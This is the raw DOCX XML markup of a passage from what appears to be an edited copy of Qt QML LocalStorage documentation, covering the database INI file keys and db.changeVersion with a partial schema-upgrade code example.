      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is called with the database as a parameter.</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identifier</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is the name of the physical file (with or without full path) containing the database.</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description</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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estimated_size</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are written to the INI file (described below), but are currently unused.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>May throw exception with code property SQLException.DATABASE_ERR, or SQLException.VERSION_ERR.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When a database is first created, an </w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INI file is also created specifying its characteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8627"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958"/>
        <w:gridCol w:w="5669"/>
      </w:tblGrid>
      <w:tr w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidTr="0068181D">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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68181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Key</w:t>
            </w:r>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68181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068181D" w:rsidRPr="002230B8" w:rsidTr="0068181D">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rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Identifier</w:t>
            </w:r>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lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The name of the database passed to</w:t>
            </w:r>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>openDatabase()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068181D" w:rsidRPr="002230B8" w:rsidTr="0068181D">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68181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>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68181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The version of the database passed to</w:t>
            </w:r>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>openDatabase()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068181D" w:rsidRPr="002230B8" w:rsidTr="0068181D">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rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>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lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The description of the database passed to</w:t>
            </w:r>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>openDatabase()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068181D" w:rsidRPr="002230B8" w:rsidTr="0068181D">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68181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>EstimatedSize</w:t>
            </w:r>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68181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The estimated size (in bytes) of the database passed to</w:t>
            </w:r>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>openDatabase()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidTr="0068181D">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rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Driver</w:t>
            </w:r>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rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Currently "QSQLITE"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">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464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This data can be used by application tools</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="008F1DE7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1354" w:name="db-changeversion-from-to-callback-tx"/>
      <w:bookmarkStart w:id="1355" w:name="_Toc483000820"/>
      <w:bookmarkStart w:id="1356" w:name="_Toc483604166"/>
      <w:bookmarkStart w:id="1357" w:name="_Toc483605386"/>
      <w:bookmarkEnd w:id="1354"/>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>db.changeVersion(from,</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to, callback(tx))</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1355"/>
      <w:bookmarkEnd w:id="1356"/>
      <w:bookmarkEnd w:id="1357"/>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This method allows you to perform a</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scheme Upgrade</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="008F1DE7" w:rsidRDefault="0068181D" w:rsidP="0068181D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>If the current version of</w:t>
      </w:r>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is not</w:t>
      </w:r>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, then an exception is thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Otherwise, a database transaction is created and passed to</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callback</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In this function, you can call</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executeSql</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on</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tx</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to upgrade the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>May throw exception with code property SQLException.DATABASE_ERR or SQLException.UNKNOWN_ERR.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00464480" w:rsidRPr="008F1DE7" w:rsidRDefault="008F1DE7" w:rsidP="0068181D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00464480" w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu the description of this function.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">See </w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> below.</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> db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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LocalStorage</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openDatabaseSync</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"ActivityTrackDB"</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"Database tracking sports activities"</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1000000</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="000821BB" w:rsidRDefault="0068181D" w:rsidP="0068181D">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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if</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db</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version </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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'0.1'</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pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="000821BB" w:rsidRDefault="0068181D" w:rsidP="0068181D">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db</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changeVersion</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'0.1'</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'0.2'</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</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tx</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pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="000821BB" w:rsidRDefault="0068181D" w:rsidP="0068181D">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tx</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executeSql</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
